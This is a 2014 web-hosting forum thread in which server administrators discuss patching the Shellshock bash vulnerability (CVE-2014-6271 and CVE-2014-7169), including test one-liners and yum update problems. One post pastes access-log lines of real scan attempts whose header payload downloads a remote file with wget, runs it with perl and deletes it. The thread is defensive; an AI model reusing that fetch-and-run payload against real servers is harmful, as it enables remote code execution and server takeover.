Bash Code Injection Vulnerability via Specially Crafted Environment Variables (CVE-2014-6271)
Attackvector: e.g limited SSH accounts or URL via Apache CGI.
Not sure if suPHP would prevent attack.
Always good to disable PHP functions like system() or exec().
[url=http://lists.centos.org/pipermail/centos-announce/2014-September/020585.html][CentOS-announce] CESA-2014:1293 Critical CentOS 6 bash Security Update
-
[quote="cPanelMichael, post: 1738521">The official announcement from the cPanel security team is available at: [url=http://cpanel.net/cpanel-security-team-bash-cve-2014-6217-and-cve-2014-7169/]cPanel Security Team: Bash CVE-2014-6217 and CVE-2014-7169 | cPanel, Inc. Thank you.
The article might need an update. The Red Hat Enterprise Linux 6 have bash-4.1.2-15.el6_5.2 now. The RHEL5 and 7 may have updates too.0 -
Re: cPanel Security Team: Bash CVE-2014-6217 and CVE-2014-7169 To the poster asking if they need to reboot after, it's clearly stated in all relevant posts and articles that after bash is updated you need to reboot the system. 0 -
The bash news today, will it be fixed with the nightly update? I got several messages of how bash is not secure, will this be updated tonight via CPanel? 0 -
Nobody posted this yet but this is how you can test if the vulnerability is present or not Shellshock CVE-2014-6271 env x='() { :;}; echo vulnerable' bash -c "" | grep vulnerable
If you get the following, you are still vulnerable:vulnerable
Aftershock CVE-2014-7169env x='() {(a)=>\' bash -c "echo date" 2>/dev/null; cat echo; rm -f echo
If you get the date, you are still vulnerable:Fri Sep 26 18:40:39 MST 2014
I tested in x86, x64, debian, centos, ubuntu, kali no idea about Freebsd or Mac Notice that bash in windows is vulnerable too (git bash as a example)0 -
[quote="DWHS.net, post: 1739062">I got several messages of how bash is not secure, will this be updated tonight via CPanel?
I've moved your post to this ongoing thread with details. Force an upgrade via WHM, search the update log for the term, bash. You will find it there. Thanks.0 -
Bash Bug Hello All After executing yum update bash command I performed test again and I got results : env x='() { :;}; echo vulnerable' bash -c "echo this is a test" this is a test So is this okay Now ? 0 -
Re: cPanel Security Team: Bash CVE-2014-6217 and CVE-2014-7169 From your quote [QUOTE]Carry out the following operation if system cannot be rebooted. /sbin/ldconfig 0 -
Re: cPanel Security Team: Bash CVE-2014-6217 and CVE-2014-7169 Already seeing automatic scans for this: :66.186.2.163 - - [26/Sep/2014:06:11:10 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 403 812 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" :66.186.2.163 - - [26/Sep/2014:06:11:10 -0400] "GET /cgi-bin/php5 HTTP/1.0" 403 812 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" :66.186.2.163 - - [26/Sep/2014:06:11:10 -0400] "GET /cgi-bin/info.sh HTTP/1.0" 403 812 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" :66.186.2.163 - - [26/Sep/2014:06:11:10 -0400] "GET /cgi-bin/php.fcgi HTTP/1.0" 403 812 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" :66.186.2.163 - - [26/Sep/2014:06:11:10 -0400] "GET /cgi-bin/php HTTP/1.0" 403 812 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" :66.186.2.163 - - [26/Sep/2014:06:11:10 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 403 812 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
which ModSecurity and Atomic rules force a 403, but also seeing this today::107.161.199.217 - - [27/Sep/2014:06:38:00 -0400] "GET /cgi-sys/suspendedpage.cgi HTTP/1.1" 200 3639 "http:///cgi-sys/suspendedpage.cgi" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
where the domain isn't actually suspended, but wondering if someone is looking for an attack vector using suspendedpage.cgi? Something need to be done there to prevent access to that?0 -
yum -y update bash --->No Packages marked for Update Hi all, I have some problem about update bash: after run below then show "No Packages marked for Update": yum clean all ---> yum makecache ---> yum -y update bash --->No Packages marked for Update as following: root@whm [~]# yum clean all Loaded plugins: fastestmirror Cleaning repos: base extras updates Cleaning up Everything Cleaning up list of fastest mirrors root@whm [~]# yum makecache Loaded plugins: fastestmirror Determining fastest mirrors * base: centos.uhost.hk * extras: centos.uhost.hk * updates: centos.uhost.hk base | 3.7 kB 00:00 base/group_gz | 220 kB 00:00 base/filelists_db | 5.9 MB 00:00 base/primary_db | 4.4 MB 00:00 base/other_db | 2.8 MB 00:00 extras | 3.3 kB 00:00 extras/filelists_db | 11 kB 00:00 extras/prestodelta | 904 B 00:00 extras/primary_db | 19 kB 00:00 extras/other_db | 22 kB 00:00 updates | 3.4 kB 00:00 updates/filelists_db | 3.0 MB 00:00 updates/prestodelta | 507 kB 00:00 updates/primary_db | 5.3 MB 00:00 updates/other_db | 46 MB 00:01 Metadata Cache Created root@whm [~]# yum -y update bash Loaded plugins: fastestmirror Loading mirror speeds from cached hostfile * base: centos.uhost.hk * extras: centos.uhost.hk * updates: centos.uhost.hk Setting up Update Process No Packages marked for Update
the version of bash as following:root@whm [~]# rpm -q bash bash-4.1.2-15.el6_5.2.x86_64
However when test the problem about bash:root@whm [~]# env x='() { :;}; echo vulnerable' bash -c "echo this is a test" this is a test
And I cannot find the bash patchroot@whm [~]# yum list updates Loaded plugins: fastestmirror Loading mirror speeds from cached hostfile * base: centos.uhost.hk * extras: centos.uhost.hk * updates: centos.uhost.hk Updated Packages device-mapper-multipath.x86_64 0.4.9-72.el6_5.4 updates device-mapper-multipath-libs.x86_64 0.4.9-72.el6_5.4 updates kernel.x86_64 2.6.32-431.29.2.el6 updates kpartx.x86_64 0.4.9-72.el6_5.4 updates nss.x86_64 3.16.1-7.el6_5 updates nss-softokn.x86_64 3.14.3-12.el6_5 updates nss-softokn-freebl.x86_64 3.14.3-12.el6_5 updates nss-sysinit.x86_64 3.16.1-7.el6_5 updates nss-tools.x86_64 3.16.1-7.el6_5 updates nss-util.x86_64 3.16.1-2.el6_5 updates
I would like to ask how can I fix the problem "No Packages marked for Update"? Is the patch of bash fix "Bash Code Injection "? Thank all!0 -
Re: cPanel Security Team: Bash CVE-2014-6217 and CVE-2014-7169 jasonman, you already have the latest bash = bash-4.1.2-15.el6_5.2.x86_64 0 -
[QUOTE]Bash Latest Patch / Status Update According to a Google Security Researcher who was able to defeat all of the current patches and make the vulnerability easier to exploit, they are now recommending the following unofficial patch until it is pushed upstream: /http://www.openwall.com/lists/oss-security/2014/09/25/13 Further Information: /http://www.itnews.com.au/News/396256,further-flaws-render-shellshock-patch-ineffective.aspx
It sounds like the 2 current updates out there do not address the bash vulnerability. Is cPanel going to patch bash prior to the next updates from RedHat, etc? Best regards, Eric0 -
Re: cPanel Security Team: Bash CVE-2014-6217 and CVE-2014-7169 Thank you, eva2000!:) 0 -
[quote="sozotech, post: 1739932">It sounds like the 2 current updates out there do not address the bash vulnerability. Is cPanel going to patch bash prior to the next updates from RedHat, etc? Best regards, Eric
That would be an OS vendor issue. Redhat/CentOS should have a patch in place that guarantees that none of the public exploits and proof of concepts can be successful. I'm not confident that is the case though. The last word that I red from RedHat seems to indicate that they are confident their current Bash is okay. But I dont know. I'm not counting on it.0
Please sign in to leave a comment.
Comments
45 comments